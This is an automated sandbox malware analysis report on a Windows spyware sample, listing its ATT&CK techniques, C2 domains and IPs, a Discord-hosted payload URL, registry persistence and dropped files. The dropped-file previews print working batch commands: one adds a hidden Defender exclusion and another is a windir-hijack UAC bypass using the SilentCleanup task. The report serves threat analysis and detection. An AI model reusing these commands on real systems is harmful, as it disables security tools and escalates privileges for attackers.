Local Accounts	Service Execution2	Logon Script (Mac)	Process Injection112	Software Packing1	NTDS	File and Directory Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Registry Run Keys / Startup Folder1	Masquerading1	LSA Secrets	System Information Discovery33	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol12	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Access Token Manipulation1	Cached Domain Credentials	Security Software Discovery12	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Process Injection112	DCSync	Process Discovery2	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Owner/User Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	Remote System Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
V8IB839cvz.exe	41%	ReversingLabs	Win32.Spyware.Noon
V8IB839cvz.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\Public\Xypgtv\Xypgtv.exe	100%	Joe Sandbox ML
C:\Users\Public\Xypgtv\Xypgtv.exe	41%	ReversingLabs	Win32.Spyware.Noon

Unpacked PE Files

Source	Detection	Scanner	Label	Download
17.2.Xypgtv.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1141389	Download File
15.2.Xypgtv.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1141389	Download File
2.2.V8IB839cvz.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1141389	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
nothinglike.ac.ug	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
cdn.discordapp.com	162.159.130.233	true	false	high
nothinglike.ac.ug	79.134.225.25	true	true	unknown
brudfascaqezd.ac.ug	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
nothinglike.ac.ug	true	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
79.134.225.25	nothinglike.ac.ug	Switzerland	6775	FINK-TELECOM-SERVICESCH	true
162.159.130.233	cdn.discordapp.com	United States	13335	CLOUDFLARENETUS	false
162.159.133.233	unknown	United States	13335	CLOUDFLARENETUS	false
162.159.134.233	unknown	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	429553
Start date:	04.06.2021
Start time:	09:39:07
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 51s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	V8IB839cvz.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	21
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@16/9@96/5
EGA Information:	Failed
HDC Information:	Successful, ratio: 32.9% (good quality ratio 30.6%) Quality average: 78.7% Quality standard deviation: 28%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe TCP Packets have been reduced to 100 Excluded IPs from analysis (whitelisted): 52.255.188.83, 104.43.139.144, 104.43.193.48, 13.88.21.125, 40.88.32.150, 104.42.151.234, 52.147.198.201, 20.50.102.62, 52.155.217.156, 205.185.216.42, 205.185.216.10, 20.54.26.129, 92.122.213.247, 92.122.213.194, 20.82.210.154 Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, ctldl.windowsupdate.com, skypedataprdcolcus16.cloudapp.net, cds.d2s7q6s2.hwcdn.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus15.cloudapp.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found. VT rate limit hit for: /opt/package/joesandbox/database/analysis/429553/sample/V8IB839cvz.exe

Simulations

Behavior and APIs

Time	Type	Description
09:39:54	API Interceptor	3x Sleep call for process: V8IB839cvz.exe modified
09:40:14	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Xypgtv C:\Users\Public\vtgpyX.url
09:40:23	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Xypgtv C:\Users\Public\vtgpyX.url
09:40:24	API Interceptor	4x Sleep call for process: Xypgtv.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
79.134.225.25	afp-00553223.pdf.exe	Get hash	malicious	Browse
	To1sRo1E8P.exe	Get hash	malicious	Browse
	BhTxt5BUvy.exe	Get hash	malicious	Browse
	5H957qLghX.exe	Get hash	malicious	Browse
	yQY73z6zaP.exe	Get hash	malicious	Browse
	Delivery pdf.exe	Get hash	malicious	Browse
	fnfqzfwC44.exe	Get hash	malicious	Browse
	Form pdf.exe	Get hash	malicious	Browse
	Purchase Order3.scr.exe	Get hash	malicious	Browse
	PURCHASE_ORDER2.scr.exe	Get hash	malicious	Browse
	M1agnNpcj2.exe	Get hash	malicious	Browse
162.159.130.233	order-confirmation.doc__.rtf	Get hash	malicious	Browse	cdn.discordapp.com/attachments/843685789120331799/847476783744811018/OtI.exe
	Order Confirmation.doc	Get hash	malicious	Browse	cdn.discordapp.com/attachments/843685789120331799/847476783744811018/OtI.exe
	cfe14e87_by_Libranalysis.rtf	Get hash	malicious	Browse	cdn.discordapp.com/attachments/520353354304585730/839557970173100102/ew.exe
	SkKcQaHEB8.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/808882061918076978/836771636082376724/VMtEguRH.exe
	P20200107.DOC	Get hash	malicious	Browse	cdn.discordapp.com/attachments/808882061918076978/836771636082376724/VMtEguRH.exe
	FBRO ORDER SHEET - YATSAL SUMMER 2021.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/832005460982235229/836405556838924308/usd.exe
	SKM_C258 Up21042213080.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/832005460982235229/834717762281930792/12345.exe
	SKM_C258 Up21042213080.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/832005460982235229/834717762281930792/12345.exe
	G019 & G022 SPEC SHEET.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/832005460982235229/834598381472448573/23456.exe
	Marking Machine 30W Specification.exe	Get hash	malicious	Browse	cdn.discordapp.com/attachments/832005460982235229/834598381472448573/23456.exe
	2021 RFQ Products Required.doc	Get hash	malicious	Browse	cdn.discordapp.com/attachments/821511904769998921/821511945881911306/panam.exe
	Company Reference1.doc	Get hash	malicious	Browse	cdn.discordapp.com/attachments/819949436054536222/820935251337281546/nbalax.exe
	PAY SLIP.doc	Get hash	malicious	Browse	cdn.discordapp.com/attachments/788946375533789214/788947376849027092/atlasx.scr
	SecuriteInfo.com.Exploit.Rtf.Obfuscated.16.25071.rtf	Get hash	malicious	Browse	cdn.discordapp.com/attachments/785423761461477416/785424240047947786/angelrawfile.exe
	part1.rtf	Get hash	malicious	Browse	cdn.discordapp.com/attachments/783666652440428545/783667553490698250/kdot.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
cdn.discordapp.com	SOA #220953.exe	Get hash	malicious	Browse	162.159.129.233
	soa5.exe	Get hash	malicious	Browse	162.159.130.233
	soa5.exe	Get hash	malicious	Browse	162.159.134.233
	Rendi i ri eshte i bashkangjitur.exe	Get hash	malicious	Browse	162.159.130.233
	Rendi i ri eshte i bashkangjitur.exe	Get hash	malicious	Browse	162.159.130.233
	68avRiNoDd.exe	Get hash	malicious	Browse	162.159.130.233
	Invoice.05192921.exe	Get hash	malicious	Browse	162.159.135.233
	ItQw2Ud9WL.exe	Get hash	malicious	Browse	162.159.129.233
	Kv6wO46d8e.exe	Get hash	malicious	Browse	162.159.129.233
	FOB offer_1164087223_I0133P2100363812.pdf (1).exe	Get hash	malicious	Browse	162.159.135.233
	SecuriteInfo.com.Troj.Kryptik-TR.10844.exe	Get hash	malicious	Browse	162.159.134.233
	SecuriteInfo.com.Troj.Kryptik-TR.30930.exe	Get hash	malicious	Browse	162.159.134.233
	Payment Invoice _ Purchase Invoice Mar 2021.docm	Get hash	malicious	Browse	162.159.129.233
	SecuriteInfo.com.Exploit.Rtf.Obfuscated.16.29692.rtf	Get hash	malicious	Browse	162.159.135.233
	SecuriteInfo.com.W32.AIDetect.malware2.9276.exe	Get hash	malicious	Browse	162.159.130.233
	tes.exe	Get hash	malicious	Browse	162.159.133.233
	YH6Zy2Q5e2.doc	Get hash	malicious	Browse	162.159.130.233
	New order 201534.doc	Get hash	malicious	Browse	162.159.135.233
	003 SOA.exe	Get hash	malicious	Browse	162.159.133.233
	eBay-invoice-2195921.vbs	Get hash	malicious	Browse	162.159.130.233
nothinglike.ac.ug	8B1C960881FC789460B5B274ABD43BADDB1C92E1A942D.exe	Get hash	malicious	Browse	79.134.225.25
	To1sRo1E8P.exe	Get hash	malicious	Browse	79.134.225.25
	wNgiGmsOwT.exe	Get hash	malicious	Browse	79.134.225.25
	BhTxt5BUvy.exe	Get hash	malicious	Browse	79.134.225.25
	5H957qLghX.exe	Get hash	malicious	Browse	79.134.225.25
	yQY73z6zaP.exe	Get hash	malicious	Browse	79.134.225.25
	h1gMAKBj8d.exe	Get hash	malicious	Browse	79.134.225.25
	2df27f1a3505dbd0995188d49c253f5bc53c0e994954c.exe	Get hash	malicious	Browse	79.134.225.25
	1AQz4ua1TU.exe	Get hash	malicious	Browse	79.134.225.25
	fnfqzfwC44.exe	Get hash	malicious	Browse	79.134.225.25
	UNiOOhIN3e.exe	Get hash	malicious	Browse	185.244.30.241
	bDbA5Bf1k2.exe	Get hash	malicious	Browse	185.244.30.241
	mDxyEfHSMs.exe	Get hash	malicious	Browse	185.244.30.241
	z3LPr7pOcN.exe	Get hash	malicious	Browse	185.140.53.149
	OOQ10YZ15n.exe	Get hash	malicious	Browse	185.140.53.149
	xytEWWD2QN.exe	Get hash	malicious	Browse	185.140.53.149
	itqFYYnm5j.exe	Get hash	malicious	Browse	185.140.53.149
	e7zQwqIDCO.exe	Get hash	malicious	Browse	185.140.53.149
	eTDAg77Nif.exe	Get hash	malicious	Browse	185.140.53.149
	hG8XQh9hMy.exe	Get hash	malicious	Browse	185.140.53.149

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	AW94CUMB58.exe	Get hash	malicious	Browse	172.67.181.37
	new_fax_message.html	Get hash	malicious	Browse	104.18.11.207
	Urgent RFQ_AP65425652_032421,pdf.exe	Get hash	malicious	Browse	104.21.19.200
	VM_5823_05_24_2-2.html	Get hash	malicious	Browse	104.18.11.207
	TT Swif_66E3563653553_PDF_.exe	Get hash	malicious	Browse	104.21.19.200
	IMG_15_60_103_681.xlsx	Get hash	malicious	Browse	104.21.19.200
	INVOICE SC1289.exe	Get hash	malicious	Browse	104.21.19.200
	Payment Slip.exe	Get hash	malicious	Browse	172.67.188.154
	PO-8372929.exe	Get hash	malicious	Browse	172.67.188.154
	v1RXFMUMfIXWvDX.exe	Get hash	malicious	Browse	104.21.19.200
	SecuriteInfo.com.Trojan.GenericKD.46394915.32529.exe	Get hash	malicious	Browse	172.67.134.204
	Secured-Message_7634-7.html	Get hash	malicious	Browse	104.18.11.207
	SecuriteInfo.com.Trojan.Win32.Save.a.6900.exe	Get hash	malicious	Browse	172.67.206.72
	_Vm064855583.HtM	Get hash	malicious	Browse	104.18.11.207
	SOA #093732.exe	Get hash	malicious	Browse	172.67.130.122
	0900009000000000.exe	Get hash	malicious	Browse	172.67.188.154
	_.html	Get hash	malicious	Browse	104.18.10.207
	SOA #220953.exe	Get hash	malicious	Browse	162.159.135.233
	1.dll	Get hash	malicious	Browse	104.20.185.68
	MT103.exe	Get hash	malicious	Browse	172.67.188.154
CLOUDFLARENETUS	AW94CUMB58.exe	Get hash	malicious	Browse	172.67.181.37
	new_fax_message.html	Get hash	malicious	Browse	104.18.11.207
	Urgent RFQ_AP65425652_032421,pdf.exe	Get hash	malicious	Browse	104.21.19.200
	VM_5823_05_24_2-2.html	Get hash	malicious	Browse	104.18.11.207
	TT Swif_66E3563653553_PDF_.exe	Get hash	malicious	Browse	104.21.19.200
	IMG_15_60_103_681.xlsx	Get hash	malicious	Browse	104.21.19.200
	INVOICE SC1289.exe	Get hash	malicious	Browse	104.21.19.200
	Payment Slip.exe	Get hash	malicious	Browse	172.67.188.154
	PO-8372929.exe	Get hash	malicious	Browse	172.67.188.154
	v1RXFMUMfIXWvDX.exe	Get hash	malicious	Browse	104.21.19.200
	SecuriteInfo.com.Trojan.GenericKD.46394915.32529.exe	Get hash	malicious	Browse	172.67.134.204
	Secured-Message_7634-7.html	Get hash	malicious	Browse	104.18.11.207
	SecuriteInfo.com.Trojan.Win32.Save.a.6900.exe	Get hash	malicious	Browse	172.67.206.72
	_Vm064855583.HtM	Get hash	malicious	Browse	104.18.11.207
	SOA #093732.exe	Get hash	malicious	Browse	172.67.130.122
	0900009000000000.exe	Get hash	malicious	Browse	172.67.188.154
	_.html	Get hash	malicious	Browse	104.18.10.207
	SOA #220953.exe	Get hash	malicious	Browse	162.159.135.233
	1.dll	Get hash	malicious	Browse	104.20.185.68
	MT103.exe	Get hash	malicious	Browse	172.67.188.154
FINK-TELECOM-SERVICESCH	A2PlnLyOA7.exe	Get hash	malicious	Browse	79.134.225.90
	PDF 209467_9377363745_378341152.exe	Get hash	malicious	Browse	79.134.225.11
	v4nJnRl1gt.exe	Get hash	malicious	Browse	79.134.225.9
	Invoice#282730.exe	Get hash	malicious	Browse	79.134.225.9
	Urban Receipt.exe	Get hash	malicious	Browse	79.134.225.9
	PO_20210.EXE	Get hash	malicious	Browse	79.134.225.17
	SecuriteInfo.com.Trojan.GenericKD.37013274.28794.exe	Get hash	malicious	Browse	79.134.225.90
	LOT_20210526.xlsx	Get hash	malicious	Browse	79.134.225.90
	rf1K94mmmC.exe	Get hash	malicious	Browse	79.134.225.17
	Outward Remittancepdf.exe	Get hash	malicious	Browse	79.134.225.96
	afp-00553223.pdf.exe	Get hash	malicious	Browse	79.134.225.25
	Q2MAUt4mRO.exe	Get hash	malicious	Browse	79.134.225.90
	4fn66P5vkl.exe	Get hash	malicious	Browse	79.134.225.90
	P_O 00041221.xlsx	Get hash	malicious	Browse	79.134.225.90
	LOT_20210526.xlsx	Get hash	malicious	Browse	79.134.225.90
	Z5CoLMcXk1.exe	Get hash	malicious	Browse	79.134.225.69
	fUt23uSFwh.exe	Get hash	malicious	Browse	79.134.225.18
	rpsmtJslZb.vbs	Get hash	malicious	Browse	79.134.225.10
	https___cdn-111.anonfiles.com_heCeW9x6u7_3be78282-1622068029_PO_20880538.exe	Get hash	malicious	Browse	79.134.225.7
	PO# JNE81H10-4 SOLSITIGES REQUOTATION FOR PURCHASE - H#80-281.exe	Get hash	malicious	Browse	79.134.225.5

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	6qpuabiBHa.exe	Get hash	malicious	Browse	162.159.130.233 162.159.133.233 162.159.134.233
	Invoice.xlsm	Get hash	malicious	Browse	162.159.130.233 162.159.133.233 162.159.134.233
	Prudential Investment Services.doc	Get hash	malicious	Browse	162.159.130.233 162.159.133.233 162.159.134.233
	N1LUjx76rV.exe	Get hash	malicious	Browse	162.159.130.233 162.159.133.233 162.159.134.233
	0izHwHXyfm.exe	Get hash	malicious	Browse	162.159.130.233 162.159.133.233 162.159.134.233
	gtJl8IPauk.exe	Get hash	malicious	Browse	162.159.130.233 162.159.133.233 162.159.134.233
	SOA #220953.exe	Get hash	malicious	Browse	162.159.130.233 162.159.133.233 162.159.134.233
	soa5.exe	Get hash	malicious	Browse	162.159.130.233 162.159.133.233 162.159.134.233
	soa5.exe	Get hash	malicious	Browse	162.159.130.233 162.159.133.233 162.159.134.233
	HUa0EaTZco.exe	Get hash	malicious	Browse	162.159.130.233 162.159.133.233 162.159.134.233
	Xerox scan.html	Get hash	malicious	Browse	162.159.130.233 162.159.133.233 162.159.134.233
	Rendi i ri eshte i bashkangjitur.exe	Get hash	malicious	Browse	162.159.130.233 162.159.133.233 162.159.134.233
	Rendi i ri eshte i bashkangjitur.exe	Get hash	malicious	Browse	162.159.130.233 162.159.133.233 162.159.134.233
	sample-20200604.exe	Get hash	malicious	Browse	162.159.130.233 162.159.133.233 162.159.134.233
	sample-20200604.exe	Get hash	malicious	Browse	162.159.130.233 162.159.133.233 162.159.134.233
	#Ud83d#Udcde_Message_Received_05_19_21.htm.htm	Get hash	malicious	Browse	162.159.130.233 162.159.133.233 162.159.134.233
	JC0KUeH450.exe	Get hash	malicious	Browse	162.159.130.233 162.159.133.233 162.159.134.233
	oNd23tLLxr.exe	Get hash	malicious	Browse	162.159.130.233 162.159.133.233 162.159.134.233
	Donation Receipt 36561536.doc	Get hash	malicious	Browse	162.159.130.233 162.159.133.233 162.159.134.233

Dropped Files

No context

Created / dropped Files

C:\Users\Public\KDECO.bat Download File
Process:	C:\Users\user\Desktop\V8IB839cvz.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	155
Entropy (8bit):	4.687076340713226
Encrypted:	false
SSDEEP:	3:LjT5LJJFIf9oM3KN6QNb3DM9bWQqA5SkrF2VCceGAFddGeWLCXlRA3+OR:rz81R3KnMMQ75ieGgdEYlRA/R
MD5:	213C60ADF1C9EF88DC3C9B2D579959D2
SHA1:	E4D2AD7B22B1A8B5B1F7A702B303C7364B0EE021
SHA-256:	37C59C8398279916CFCE45F8C5E3431058248F5E3BEF4D9F5C0F44A7D564F82E
SHA-512:	FE897D9CAA306B0E761B2FD61BB5DC32A53BFAAD1CE767C6860AF4E3AD59C8F3257228A6E1072DAB0F990CB51C59C648084BA419AC6BC5C0A99BDFFA569217B7
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	start /min powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" & exit

C:\Users\Public\Trast.bat Download File
Process:	C:\Users\user\Desktop\V8IB839cvz.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	34
Entropy (8bit):	4.314972767530033
Encrypted:	false
SSDEEP:	3:LjTnaHF5wlM:rnaHSM
MD5:	4068C9F69FCD8A171C67F81D4A952A54
SHA1:	4D2536A8C28CDCC17465E20D6693FB9E8E713B36
SHA-256:	24222300C78180B50ED1F8361BA63CB27316EC994C1C9079708A51B4A1A9D810
SHA-512:	A64F9319ACC51FFFD0491C74DCD9C9084C2783B82F95727E4BFE387A8528C6DCF68F11418E88F1E133D115DAF907549C86DD7AD866B2A7938ADD5225FBB2811D
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	start /min C:\Users\Public\UKO.bat

C:\Users\Public\UKO.bat Download File
Process:	C:\Users\user\Desktop\V8IB839cvz.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	250
Entropy (8bit):	4.865356627324657
Encrypted:	false
SSDEEP:	6:rgnMXd1CQnMXd1COm8hnaHNHIXUnMXd1CoD9c1uOw1H1gOvOBAn:rgamIHIXUaXe1uOeVqy
MD5:	EAF8D967454C3BBDDBF2E05A421411F8
SHA1:	6170880409B24DE75C2DC3D56A506FBFF7F6622C
SHA-256:	F35F2658455A2E40F151549A7D6465A836C33FA9109E67623916F889849EAC56
SHA-512:	FE5BE5C673E99F70C93019D01ABB0A29DD2ECF25B2D895190FF551F020C28E7D8F99F65007F440F0F76C5BCAC343B2A179A94D190C938EA3B9E1197890A412E9
Malicious:	false
Preview:	reg delete hkcu\Environment /v windir /f..reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "..schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I & exit..

C:\Users\Public\Xypgtv\Xypgtv.exe Download File
Process:	C:\Users\user\Desktop\V8IB839cvz.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	690178
Entropy (8bit):	6.950419723768229
Encrypted:	false
SSDEEP:	12288:4wZeGjiyhybwk6VAn0+A2NUj4pfIMNFYoOOikh4AOpbAF++n/tq:4sjhyZn4VuIMz8AAbAl/tq
MD5:	10D42F55D89B6FD42404E470E68F1996
SHA1:	3B9787BBFAAE456FE082DB8E2E61C70C5FB45328
SHA-256:	B84A345EFDDFA5A852C3E3C5C2C97DAB1A6F4643906D80C0C8CAFA1E25247326
SHA-512:	13403037FADBCA2F2DF76946D21EED91AFF9418A24ED1CE87C667447C352CD9EC50CDBFDA9D64EE51FBD879FBAB3610DAFBB12D3272332B16BCD8736395B31CE
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 41%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@..............................."...........................`...i...........................P......................................................CODE....l........................... ..`DATA................................@...BSS.....q................................idata...".......$..................@....tls.........@...........................rdata.......P......................@..P.reloc...i...`...j..................@..P.rsrc................v..............@..P............. ......................@..P........................................................................................................................................

C:\Users\Public\nest Download File
Process:	C:\Users\user\Desktop\V8IB839cvz.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	8
Entropy (8bit):	3.0
Encrypted:	false
SSDEEP:	3:8vn:8vn
MD5:	0A666A12354EAE791661C1CE159A69AC
SHA1:	E7C7371C04C376BD74D0CF69C6A2360011D140BA
SHA-256:	A87D5B8EF1668068D22B2A226BD3C9FCBBDF554750D18319EF13B746D38B74CF
SHA-512:	6BEE681EDF46654419CD8B943AD46A7D8257B41D3486D2C0299AC98FEFAC3B8E598243C16E9060F26BFBCA2EFEA53794692FE33EBEC0480E576187DC9552A445
Malicious:	false
Preview:	Xypgtv..

C:\Users\Public\vtgpyX.url Download File
Process:	C:\Users\user\Desktop\V8IB839cvz.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Xypgtv\\Xypgtv.exe">), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	83
Entropy (8bit):	4.9179828413523765
Encrypted:	false
SSDEEP:	3:HRAbABGQYmTWAX+rSF55+MT+oRTL4bsGKd6ov:HRYFVmTWDySomsbDv
MD5:	719E8AB2AA893E297808AC73867E8C62
SHA1:	BA519ED8B0C50F2A928BAAACC2E7373710A1EB51
SHA-256:	DDE2E95AEDC7BD872AAFCF17FB3A3D69546044EF07CBD79317EDD2038826086A
SHA-512:	C0B62D3A839B810F157773F14805BDC0DF1A73489C59FA7BCC7190809D2A6515CA5344729026969D905257E8F0EF31EA843784FE16C741BE0709CC858C4C9F6D
Malicious:	false
Yara Hits:	Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\Public\vtgpyX.url, Author: @itsreallynick (Nick Carr)
Preview:	[InternetShortcut]..URL=file:"C:\\Users\\Public\\Xypgtv\\Xypgtv.exe"..IconIndex=2..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\Xypgtvglqrlgdvgezyimsisukuqhicz[1] Download File
Process:	C:\Users\Public\Xypgtv\Xypgtv.exe
File Type:	data
Category:	dropped
Size (bytes):	536576
Entropy (8bit):	7.589312195933217
Encrypted:	false
SSDEEP:	12288:YATVsnavJYSyMuglMbn6834oiuE7uL+2psMCDPs:YATVtyJMFMbn68oo7E7ui2psdU
MD5:	04409EA53817D75CD40FC7653592D001
SHA1:	4DC7DD23E4A02D6BFF089BAC32285CD8C12F4250
SHA-256:	8F4220EF61F0352918F5DDA825014FA67C342A9C2864DEF4E0DCE8FF23819EEE
SHA-512:	FF1DCA551C9D4D26D34A3C089E8BD008FD0C277D3F834AC8D32E8FD5620403A4CB9B829E9BC243B80646281B084645C25FC60AA76A88A6E12C2B7681E0E99562
Malicious:	false
Preview:	~)........@.00..............................................2.....P.:.R.2..R__#7...?A..A....C.1..A.=.=3.A.=d.>..h.........................................................................................................................................v...2..J-...........].<2.J.?2........gC2......O2...........................................2..................................o2..@...2..A....................2..N..................................................................................t..v....=2......?2..................../.r#r....@...O2......M2........................Z...._2......]2..................3.C....@...o2......]2.................A.;.....N....2......m2..................A.A.....A...2..C...2..............................2......2.........................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OR0WKIO1\Xypgtvglqrlgdvgezyimsisukuqhicz[1] Download File
Process:	C:\Users\Public\Xypgtv\Xypgtv.exe
File Type:	data
Category:	downloaded
Size (bytes):	536576
Entropy (8bit):	7.589312195933217
Encrypted:	false
SSDEEP:	12288:YATVsnavJYSyMuglMbn6834oiuE7uL+2psMCDPs:YATVtyJMFMbn68oo7E7ui2psdU
MD5:	04409EA53817D75CD40FC7653592D001
SHA1:	4DC7DD23E4A02D6BFF089BAC32285CD8C12F4250
SHA-256:	8F4220EF61F0352918F5DDA825014FA67C342A9C2864DEF4E0DCE8FF23819EEE
SHA-512:	FF1DCA551C9D4D26D34A3C089E8BD008FD0C277D3F834AC8D32E8FD5620403A4CB9B829E9BC243B80646281B084645C25FC60AA76A88A6E12C2B7681E0E99562
Malicious:	false
IE Cache URL:	https://cdn.discordapp.com/attachments/720918485122940978/850158270907678730/Xypgtvglqrlgdvgezyimsisukuqhicz
Preview:	~)........@.00..............................................2.....P.:.R.2..R__#7...?A..A....C.1..A.=.=3.A.=d.>..h.........................................................................................................................................v...2..J-...........].<2.J.?2........gC2......O2...........................................2..................................o2..@...2..A....................2..N..................................................................................t..v....=2......?2..................../.r#r....@...O2......M2........................Z...._2......]2..................3.C....@...o2......]2.................A.;.....N....2......m2..................A.A.....A...2..C...2..............................2......2.........................................................................................................................................................................................................................................

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.950419723768229
TrID:	Win32 Executable (generic) a (10002005/4) 99.24% InstallShield setup (43055/19) 0.43% Win32 Executable Delphi generic (14689/80) 0.15% Windows Screen Saver (13104/52) 0.13% Win16/32 Executable Delphi generic (2074/23) 0.02%
File name:	V8IB839cvz.exe
File size:	690178
MD5:	10d42f55d89b6fd42404e470e68f1996
SHA1:	3b9787bbfaae456fe082db8e2e61c70c5fb45328
SHA256:	b84a345efddfa5a852c3e3c5c2c97dab1a6f4643906d80c0c8cafa1e25247326
SHA512:	13403037fadbca2f2df76946d21eed91aff9418a24ed1ce87c667447c352cd9ec50cdbfda9d64ee51fbd879fbab3610dafbb12d3272332b16bcd8736395b31ce
SSDEEP:	12288:4wZeGjiyhybwk6VAn0+A2NUj4pfIMNFYoOOikh4AOpbAF++n/tq:4sjhyZn4VuIMz8AAbAl/tq
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	0064cacaaac80788

Static PE Info

General
Entrypoint:	0x45dc1c
